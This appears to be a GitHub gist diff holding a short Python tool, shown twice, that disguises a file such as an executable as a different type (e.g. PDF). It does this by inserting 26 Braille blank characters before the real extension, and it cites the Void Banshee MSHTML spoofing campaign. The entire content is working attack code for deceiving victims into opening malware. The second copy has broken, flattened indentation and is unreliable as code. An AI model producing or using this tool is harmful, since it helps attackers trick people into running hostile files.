milo2012 · September 16, 2024 09:52
diff --git a/gistfile1.txt b/gistfile1.txt
 import argparse
 import os
 import urllib.parse

 # Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability

 # Define the encoded Braille whitespace character sequence
 BRAILLE_WHITESPACE = "%E2%A0%80" * 26

 def create_spoofed_file(input_file, output_base, fake_extension):
    # Extract the original extension from the input filename
    _, original_extension = os.path.splitext(input_file)
    original_extension = original_extension.lstrip('.')

    # Read content from the input file
    with open(input_file, 'rb') as infile:
        content = infile.read()
    
    # Write the content to the output file with the fake extension
    temp_output_file = f"{output_base}.{fake_extension}"
    with open(temp_output_file, 'wb') as outfile:
        outfile.write(content)
    
    # Construct the spoofed filename with Braille whitespace
    braille_whitespace = urllib.parse.unquote(BRAILLE_WHITESPACE)  # Decode the Braille whitespace for proper encoding
    spoofed_output_file = f"{output_base}.{fake_extension}{braille_whitespace}.{original_extension}"
    
    # Rename the file to include the spoofed extension
    os.rename(temp_output_file, spoofed_output_file)
    print(f"File has been created and renamed to {spoofed_output_file}")

 def main():
    parser = argparse.ArgumentParser(description="Spoof file type by appending encoded Braille whitespace before the original extension.")
    parser.add_argument('-i', '--input', required=True, help="Input filename with original extension (e.g., 'test.exe')")
    parser.add_argument('-o', '--output', required=True, help="Base output filename (without extension)")
    parser.add_argument('-f', '--fake-extension', required=True, help="Fake file extension (e.g., 'pdf')")

    args = parser.parse_args()
    
    # Check if the output filename contains an extension
    _, output_extension = os.path.splitext(args.output)
    if output_extension:
        print(f"Warning: The output filename '{args.output}' includes an extension, which will be stripped.")
        proceed = input("Do you want to proceed with stripping the extension? (y/n): ").strip().lower()
        if proceed != 'y':
            print("Operation canceled.")
            return
    
    create_spoofed_file(args.input, args.output, args.fake_extension)

 if __name__ == '__main__':
    main()
	import argparse
	import os
	import urllib.parse

	# Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability

	# Define the encoded Braille whitespace character sequence
	BRAILLE_WHITESPACE = "%E2%A0%80" * 26

	def create_spoofed_file(input_file, output_base, fake_extension):
	# Extract the original extension from the input filename
	_, original_extension = os.path.splitext(input_file)
	original_extension = original_extension.lstrip('.')

	# Read content from the input file
	with open(input_file, 'rb') as infile:
	content = infile.read()

	# Write the content to the output file with the fake extension
	temp_output_file = f"{output_base}.{fake_extension}"
	with open(temp_output_file, 'wb') as outfile:
	outfile.write(content)

	# Construct the spoofed filename with Braille whitespace
	braille_whitespace = urllib.parse.unquote(BRAILLE_WHITESPACE) # Decode the Braille whitespace for proper encoding
	spoofed_output_file = f"{output_base}.{fake_extension}{braille_whitespace}.{original_extension}"

	# Rename the file to include the spoofed extension
	os.rename(temp_output_file, spoofed_output_file)
	print(f"File has been created and renamed to {spoofed_output_file}")

	def main():
	parser = argparse.ArgumentParser(description="Spoof file type by appending encoded Braille whitespace before the original extension.")
	parser.add_argument('-i', '--input', required=True, help="Input filename with original extension (e.g., 'test.exe')")
	parser.add_argument('-o', '--output', required=True, help="Base output filename (without extension)")
	parser.add_argument('-f', '--fake-extension', required=True, help="Fake file extension (e.g., 'pdf')")

	args = parser.parse_args()

	# Check if the output filename contains an extension
	_, output_extension = os.path.splitext(args.output)
	if output_extension:
	print(f"Warning: The output filename '{args.output}' includes an extension, which will be stripped.")
	proceed = input("Do you want to proceed with stripping the extension? (y/n): ").strip().lower()
	if proceed != 'y':
	print("Operation canceled.")
	return

	create_spoofed_file(args.input, args.output, args.fake_extension)

	if __name__ == '__main__':
	main()